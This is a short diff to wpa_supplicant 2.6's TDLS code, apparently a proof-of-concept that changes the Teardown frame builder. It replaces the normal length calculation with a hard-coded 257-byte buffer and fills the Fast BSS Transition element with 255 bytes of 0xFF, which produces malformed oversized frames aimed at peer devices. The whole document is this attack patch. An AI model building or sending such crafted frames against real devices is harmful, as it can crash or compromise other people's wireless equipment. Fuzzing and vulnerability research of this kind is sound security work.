1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

--- wpa_supplicant-2.6/src/rsn_supp/tdls.c	2016-10-02 19:51:11.000000000 +0100
+++ TDLSTeardownModification/wpa_supplicant-2.6/src/rsn_supp/tdls.c	2016-12-19 12:15:28.000000000 +0000
@@ -765,15 +765,7 @@
 	wpa_printf(MSG_DEBUG, "TDLS: TDLS Teardown for " MACSTR,
 		   MAC2STR(addr));
 
-	ielen = 0;
-	if (wpa_tdls_get_privacy(sm) && peer->tpk_set && peer->tpk_success) {
-		/* To add FTIE for Teardown request and compute MIC */
-		ielen += sizeof(*ftie);
-#ifdef CONFIG_TDLS_TESTING
-		if (tdls_testing & TDLS_TESTING_LONG_FRAME)
-			ielen += 170;
-#endif /* CONFIG_TDLS_TESTING */
-	}
+	ielen = 257;
 
 	rbuf = os_zalloc(ielen + 1);
 	if (rbuf == NULL)
@@ -785,11 +777,14 @@
 
 	ftie = (struct wpa_tdls_ftie *) pos;
 	ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
+	ftie->ie_len = 255;
+	os_memset(pos + 2, 0xFF, 255);
+
 	/* Using the recent nonce which should be for CONFIRM frame */
 	os_memcpy(ftie->Anonce, peer->rnonce, WPA_NONCE_LEN);
 	os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
-	ftie->ie_len = sizeof(struct wpa_tdls_ftie) - 2;
-	pos = (u8 *) (ftie + 1);
+
+	pos += 257;
 #ifdef CONFIG_TDLS_TESTING
 	if (tdls_testing & TDLS_TESTING_LONG_FRAME) {
 		wpa_printf(MSG_DEBUG, "TDLS: Testing - add extra subelem to "